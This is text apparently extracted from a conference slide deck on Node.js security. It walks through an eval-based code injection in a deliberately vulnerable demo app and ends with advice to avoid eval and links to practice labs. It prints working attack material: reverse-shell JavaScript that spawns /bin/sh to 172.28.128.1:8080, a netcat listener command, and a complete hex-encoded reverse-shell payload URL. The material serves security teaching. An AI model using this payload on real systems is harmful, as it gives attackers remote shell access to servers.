node js reverse shell

NODE JS SECURITYVULNERABILITIES

ABOUT MEMadhu Akula - Automation Security Ninja at Interested in Security & DevOpsNever ending learner!

@madhuakulaAppsecco

WHAT IS NODE JS?

Node.js is an open-source, cross-platformruntime environment for developing server-

side Web applications.

Although Node.js is not a JavaScriptframework, many of its basic modules arewritten in JavaScript, and developers can

write new modules in JavaScript. Theruntime environment interprets JavaScript

using Google's V8 JavaScript engine.

wikipedia

HELLO WORLD HTTP SERVER INNODE JS

var http = require('http');

var server = http.createServer(function(req, res) res.writeHead(200); res.end('Hello World'); ); server.listen(2000);

WHY NODE JS SECURITY?A lot of the application are moving to Javascript, especially

with MEAN (Mongo-Express-Angular-Node) stack.

HOW TO TEST NODE JS SECURITY?It's similar to the normal web application security and adds

additional checks for the Javascript vulnerabilities.

DEMO TIME

REVERSE SHELL ON A NODE.JSAPPLICATION BY @WIREMASK

POC SETUP

VULNERABLE NODE JS CODE'use strict' const http = require('http'); const url = require('url'); const path = require('path');

const animalsJSON = path.join(__dirname, 'animals.json'); const animals = require(animalsJSON);

function requestHandler(req, res)

let urlParams = url.parse(req.url, true);

let queryData = urlParams.query;

res.writeHead(200, "Content­Type": "application/json");

ACCESS THE APPLICATIONhttp://localhost:3000/?name=do*

IDENTIFICATIONThe stringToRegexp function is evaluating user input to

create a RegExp object and use it to find elements in anarray.

return eval(prefix + output + suffix); // we control output value

We can insert our own Javascript code in the outputvariable and execute it. The stringToRegexp function

will escape some characters and the output value will beevaluated.

http://localhost:3000/?name=["./;require('util').log('Owned');//*"]

EXPLOIT(function()

var net = require("net"),

cp = require("child_process"),

sh = cp.spawn("/bin/sh", []);

var client = new net.Socket();

client.connect(8080, "172.28.128.1", function()

START NETCAT LISTENERnc ­lvp 8080

SAMPLE URLhttp://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"

HEX PAYLOAD CREATION USING PYTHON>>> payload = 'nodejs reverse shell Java Script code' >>> payload.encode('hex')

FINAL URL WITH PAYLOADhttp://localhost:3000/?name=["./;eval(new Buffer('2866756e6374696f6e28297b20766172206e6574203d207265717569726528226e657422292c206370203d207265717569726528226368696c645f70726f6365737322292c207368203d2063702e737061776e28222f62696e2f7368222c205b5d293b2076617220636c69656e74203d206e6577206e65742e536f636b657428293b20636c69656e742e636f6e6e65637428383038302c20223137322e32382e3132382e31222c2066756e6374696f6e28297b20636c69656e742e706970652873682e737464696e293b2073682e7374646f75742e7069706528636c69656e74293b2073682e7374646572722e7069706528636c69656e74293b207d293b2072657475726e202f612f3b207d2928293b', 'hex').toString());//*"

CHECK YOUR NETCAT LISTENER

CONCLUSION

It's highly recommended to avoid using theeval function in a Javascript project. The

fix was rather simple, they started usingusing the RegExp object directly.

WANT TO TRY YOUR YOURSELF?https://github.com/appsecco/vulnerable-apps

docker run ­p 3000:3000 ­d appsecco/node­reverse­shell

PLAYGROUND FOR NODEJSVULNERABILITIES

DAMN VULNERABLE NODE APPLICATIONAnsible Playbook & Docker

NODE JS SECURITY REFERENCEShttps://www.npmjs.com/package/helmet

https://blog.risingstack.com/node-js-security-checklist/https://nodesecurity.io/resources

https://groups.google.com/forum/#!forum/nodejs-sec

THANK YOUQ&A

@MADHUAKULA